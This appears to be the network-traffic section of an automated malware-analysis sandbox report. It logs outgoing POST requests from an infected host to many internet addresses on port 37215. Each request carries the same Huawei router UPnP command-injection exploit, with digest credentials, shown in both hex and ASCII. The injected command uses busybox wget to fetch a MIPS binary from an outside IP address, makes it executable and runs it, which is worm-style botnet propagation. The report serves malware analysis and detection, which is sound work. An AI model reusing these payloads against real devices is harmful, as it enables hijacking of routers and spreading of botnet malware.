                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4192.168.2.1448390197.207.188.6837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660444021 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5192.168.2.143353441.131.181.6337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660480022 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6192.168.2.144824241.211.225.17337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660517931 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7192.168.2.145145641.78.102.25437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660562038 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8192.168.2.1448092197.156.162.15737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660597086 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9192.168.2.144271441.187.63.24337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660617113 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10192.168.2.144495041.203.38.18237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660644054 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11192.168.2.145225441.96.243.6337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660691023 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12192.168.2.1446224197.145.0.4237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660691977 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13192.168.2.143643241.182.182.2537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.660742044 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
